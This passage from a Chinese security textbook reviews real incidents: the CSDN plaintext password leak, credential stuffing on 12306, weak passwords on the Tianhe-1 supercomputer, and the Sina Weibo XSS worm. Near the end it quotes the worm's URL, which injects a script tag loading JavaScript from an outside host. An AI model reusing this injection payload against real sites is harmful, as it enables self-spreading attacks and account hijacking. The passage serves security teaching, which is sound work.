2.3　安全事件敲響警鐘

2.3.1　 CSDN事件

2011年12月21日上午，有駭客在網上披露CSDN數據庫泄露，并提供了下載地址，高達600余萬個注冊郵箱與密碼泄露，并且所有密碼都使用明文儲存。CSDN是國內最大的以程序員為核心的大型網站，卻采用明文儲存用戶密碼（當時即便是小型BBS網站數據庫都采用MD5等方式對密碼加密）。

21日晚，CSDN發布聲明并道歉。據CSDN官方解釋，該數據庫為CSDN作為備份所用，CSDN在2009年4月之前是以明文保存密碼，而泄漏原因不詳。

繼CSDN的數據庫泄漏之后，天涯社區、世紀佳緣、開心網等十余家國內知名網站的近5000萬用戶信息陸續在網上被人公布，各大社區的信譽也遭受質疑。當然，這次嚴重的事故同時也提高了國內對網絡信息安全的重視。

2.3.2　 12306事件

2014年12月25上午，烏云漏洞報告平臺上出現了一則標題為“大量12306用戶數據在互聯網瘋傳，包括用戶賬號、明文密碼、身份證號碼、郵箱等（泄漏途徑目前未知）”的新聞，缺陷編號為：WooYun-2014-88532。這可讓網上一下炸了鍋，各種討論與分析瞬間出爐，根據對泄漏數據的分析及當晚的官方信息，這次事件極有可能是一次“撞庫攻擊”。那么何謂“撞庫”？就拿剛才提到的CSDN數據泄露來說，攻擊者如果用這些泄露的數據嘗試登錄12306網站，或是編寫腳本進行大量登錄測試，就叫撞庫攻擊。然而被泄露的數據遠不止CSDN這么多，量變引起質變，多米諾骨牌效應導致了大量數據的泄露。

2.3.3　 “天河”超級計算機事件

2015年2月12日，又一個神奇的漏洞引起了廣泛關注，這個漏洞竟然出現在超級計算機天河一號上，著實令人震驚（圖2-4）。但是仔細一看漏洞細節，卻又讓人啼笑皆非：天河一號的辦公環境有一個未加密的無線網絡，任何設備都可以輕易接入，直接進入內網。這位白帽子小黑客順便找了找其他可能存在的漏洞，這一找可不得了，他發現天河一號超級計算機內部存在大量弱口令，以及部分服務器存在破殼漏洞（即bash漏洞，一個十分嚴重的Linux漏洞）。

圖2-4　天河一號漏洞信息

回顧以上列舉的3個典型安全事件，其都與密碼安全息息相關，也正好對應了密碼安全中3個“過不去的坎”：明文存儲、撞庫（同一密碼多用）和弱口令。更多關于密碼安全的知識，請見附錄。

2.3.4　新浪微博XSS蠕蟲事件

2011年6月28日晚，中國大型SNS網站——新浪網的新浪微博業務遭受XSS蠕蟲攻擊。中招的微博博主會自動通過廣播和私信的方式發布一些誘惑性信息，用戶單擊鏈接后便會觸發XSS，發布同樣的信息并自動關注hellosamy，中招的用戶單擊后又會觸發XSS，蠕蟲便如鏈式反應般傳播。由于蠕蟲的指數爆炸型傳播、微博的分享形式以及一些大V認證的用戶被攻擊，該蠕蟲在16分鐘內就感染了30 000名以上用戶，可以說是近幾年中國SNS社區受到的最大的一次攻擊。

這次攻擊并沒有直接造成用戶的重大損失，更像是一場黑客的惡作劇（從收聽的hellosamy用戶也能看出，Samy是XSS蠕蟲鼻祖herosamy的作者，他的XSS蠕蟲曾造成社交網站MySpace的癱瘓）。但同樣，這次事件也提高了公眾對信息安全的關注（隨后新浪多處反射型XSS被披露）。而這次漏洞成因更讓人大跌眼鏡：新浪對該參數竟然完全沒有過濾！這次攻擊在Chrome、Safari中會被XSS Filter攔截，而IE、Firefox未能幸免，根據當時IE、Firefox的市場占有率，這的確是一次范圍很廣的攻擊。

讓我們來分析一下這個被用來傳播XSS蠕蟲的URL：

    http://weibo.com/pub/star/g/xyyyd”><script src=//www.2kt.cn/images/
t.js></script>?type=update

在訪問這個URL時，新浪會對字符串進行處理，結果變成了訪問：

    http://weibo.com/pub/star.php?g=xyyyd”><script src=//www.2kt.cn/
images/t.js></script>?type=update

由于參數g并沒有進行應有的過濾，導致這個來自外部的JS腳本被嵌入頁面內。